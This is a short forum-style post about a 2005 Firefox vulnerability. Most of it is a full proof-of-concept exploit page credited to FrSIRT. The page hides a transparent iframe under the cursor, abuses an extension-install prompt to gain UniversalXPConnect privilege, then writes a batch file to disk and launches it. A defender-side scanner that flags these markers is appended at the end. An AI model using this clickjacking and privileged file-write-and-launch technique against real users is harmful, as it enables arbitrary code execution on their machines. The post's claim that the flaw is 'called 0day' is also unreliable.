DarkMew
Watch out for this newly discovered Firefox vulnerability.
It is called "0day", the Mozilla people are working to fix it.
This is how it works:
When a user clicks inside a specially crafted web page, the browser
will make a malicious batch file and execute it.
Here is example code:
-----------0day_example.html-------------------------
// FrSIRT Comment - This is a 0day exploit/vulnerability (unpatched)
// If a user clicks anywhere on a specially crafted page, this code will
// automatically create and execute a malicious batch/exe file.
//
// Update (08.05.2005) - The Mozilla Foundation patched (partially) this
// issue on the server side by adding random letters and numbers to the
// install function, which will prevent this exploit from working.
<html><head><title>firefox 0day exploit</title>
<body>Click anywhere inside this page<br>
<br>Advisory - https://www.frsirt.com/english/advisories/2005/0493<br>
<iframe onload="loader()" src="javascript:'<noscript>'+eval('if
(window.name!=\'stealcookies\')
{window.name=\'stealcookies\';} else{ event={target:
{href:\'https://ftp.mozilla.org/pub/
mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\'}};install
(event,\'You are
vulnerable!!!\',\'javascript:eval
(\\\'netscape.security.PrivilegeManager.enablePrivilege(\\\\\\\'
UniversalXPConnect\\\\\\\');file=Components.classes
[\\\\\\\'@mozilla.org/file/local;1\\\\\\\'].
createInstance(Components.interfaces.nsILocalFile);file.initWithPath
(\\\\\\\'c:\\\\\\\\\\\\\\\\
booom.bat\\\\\\\');file.createUnique
(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);
outputStream=Components.classes[\\\\\\\'@mozilla.org/network/file-output-
stream;1\\\\\\\'].
createInstance
(Components.interfaces.nsIFileOutputStream);outputStream.init
(file,0x04|0x08
|0x20,420,0);output=\\\\\\\'@ECHO off\\\\\\\\ncls\\\\\\\\nECHO malicious
commands here...
\\\\\\\\nPAUSE\\\\\\\';outputStream.write
(output,output.length);outputStream.close();file.launch();
\\\')\'); }')+'</noscript><a
href=\'https://addons.update.mozilla.org/extensions/moreinfo.php?
id=220&application=firefox\'
style=\'cursor:default;\'> </'+'a>'"
id="targetframe" scrolling="no" frameborder="0" marginwidth="0"
marginheight=0" style=
"position:absolute; left:0px; width:0px; height:6px; width:6px; margin:0px;
padding:0px;
-moz-opacity:0"></iframe>
<script language="JavaScript" type="text/javascript">
document.onmousemove = function trackMouse(e) {
document.getElementById("targetframe").style.left = (e.pageX-3)+"px"
document.getElementById("targetframe").style.top = (e.pageY-3)+"px"
}
var counter = 0;
function loader() {
counter++
if(counter == 1) {
stealcookies.focus()
} else if(counter == 2) {
stealcookies.history.go(-1)
//targetframe.style.display="none";
}
}
</script>
</body>
</html>
---------------------------end-------------------------------------
This bug will probably be fixed soon.
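A defender-side sketch, added here and not part of the original post or the FrSIRT advisory: a static scan that flags pages combining the markers visible in the example above (a privileged `enablePrivilege` request, XPCOM local-file access with `launch()`, and an invisible `javascript:` iframe that follows the cursor). The indicator names, verdict labels and sample strings are assumptions constructed for illustration.

```javascript
// Added example: static indicator scan for pages shaped like the PoC above.
// Indicator names, verdict labels and sample pages are constructed.
const INDICATORS = [
  { name: "privilege-request", re: /enablePrivilege\(\s*['"]\s*UniversalXPConnect/ },
  { name: "xpcom-local-file", re: /@mozilla\.org\/file\/local;1/ },
  { name: "file-launch", re: /\.launch\s*\(/ },
  { name: "javascript-uri-frame", re: /<iframe[^>]*\bsrc\s*=\s*["']?\s*javascript:/i },
  { name: "invisible-frame", re: /opacity\s*:\s*0(?![.\d])/i },
  { name: "cursor-tracking", re: /onmousemove[\s\S]*?\.style\.(left|top)\s*=/ },
];

// The PoC nests eval() several levels deep, so quotes carry long runs of
// backslashes and tokens wrap across lines. Undo both before matching.
function normalize(html) {
  return html.replace(/\\+/g, "").replace(/\s+/g, " ");
}

function scanPage(html) {
  const text = normalize(html);
  const hits = INDICATORS.filter((i) => i.re.test(text)).map((i) => i.name);
  const has = (n) => hits.includes(n);
  let verdict = "clean";
  // Transparent frame glued to the pointer: any click lands inside it.
  if (has("invisible-frame") && has("cursor-tracking")) verdict = "click-hijack-overlay";
  // Privilege request plus local file access outranks the overlay finding.
  if (has("privilege-request") && (has("xpcom-local-file") || has("file-launch")))
    verdict = "privileged-file-write";
  return { verdict, hits };
}

// Constructed, inert samples: marker tokens only, not a working page.
const SAMPLE_SUSPECT = [
  '<iframe id="f" src="javascript:eval(\'x\')" style="-moz-opacity:0"></iframe>',
  "netscape.security.PrivilegeManager.enablePrivilege(\\\\\\'UniversalXPConnect\\\\\\');",
  "Components.classes[\\\\\\'@mozilla.org/file/local;1\\\\\\']; file.launch();",
  "<script>document.onmousemove = function (e) {",
  '  document.getElementById("f").style.left = e.pageX + "px"; }</script>',
].join("\n");
const SAMPLE_BENIGN = '<iframe src="https://example.org/" style="opacity:0.8"></iframe>';

console.log(scanPage(SAMPLE_SUSPECT), scanPage(SAMPLE_BENIGN));
```

Without the `normalize` step the `privilege-request` pattern misses the escaped sample, which is why the scan strips backslashes before matching.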